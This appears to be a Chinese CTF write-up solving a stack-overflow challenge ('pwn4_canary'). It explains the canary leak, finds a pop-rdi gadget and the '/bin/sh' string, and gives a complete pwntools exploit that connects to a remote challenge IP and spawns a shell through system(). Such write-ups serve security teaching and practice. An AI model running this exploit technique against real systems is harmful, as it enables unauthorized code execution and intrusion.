知识点
小端序说明,数据在内存里是如何存储的?下表里数据都为16进制
解题流程
题目Hint:更新 LibcSeacher 的 libc-database
checksec查看保护机制
存在Canary和NX。
0x28=40
0x10=16
0x29=41
0x300=768
0x2C=44
buf长度为48,而read读取长度为768
v5长度为520,而read读取长度为768
所以存在栈溢出漏洞
注意关注以下两条语句
.text:000000000040082C mov rax, fs:28h
.text:0000000000400835 mov [rbp+var_8], rax
canary存在rbp+var_8,可以在0x40082C下断点,观察下。
输入n可以看到,rax寄存器的值变为了RAX 0xeb3ebba93e8f0500
可以观察,随后会把rax的值放在rbp-8的位置
把canary这个值存内存里是这个样子的
所以现在的思路是首先依据第一次回显泄露canary的值,第二次通过利用泄露的canary值实现栈溢出。
64位程序优先通过寄存器rdi传参,所以先找pop rdi
这里还缺/bin/sh,利用ROPgadget --binary pwn4_canary --string “/bin/sh”
将"/bin/sh"作为参数传给system函数,然后调用
exp
from pwn import *
#sh = process('./pwn4_')
#context.log_level = 'debug'
sh = remote('114.67.246.176',11788)sh.recvuntil('Please leave your name(Within 36 Length)')payload1 = 'a' * 568
sh.sendline(payload1)
sh.recvuntil('a' * 568 + '\n')
#canary = u64(sh.recv(8)) - 0xa
canary = u64(b'\x00' + sh.recv(7))
log.info('canary: ' + hex(canary))sh.recvuntil('Please leave a message(Within 0x200 Length)')
pop_rdi_ret = 0x0000000000400963
system_addr = 0x400660
binsh_addr = 0x0000000000601068payload2 = b'a' * 520 + p64(canary) + p64(1) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sh.send(payload2)
sh.interactive()
运行:
报名通道即将关闭(附参会提醒)...)
)
